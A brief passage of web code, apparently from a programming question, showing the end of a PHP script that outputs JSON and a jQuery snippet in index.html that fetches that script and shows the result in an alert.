      print(json_encode($res));
      return json_encode($res);
      mysql_close();

    index.html:

      $.get('public_html/index.php', function( data ) {
          alert( 'Successful' + data );
      });
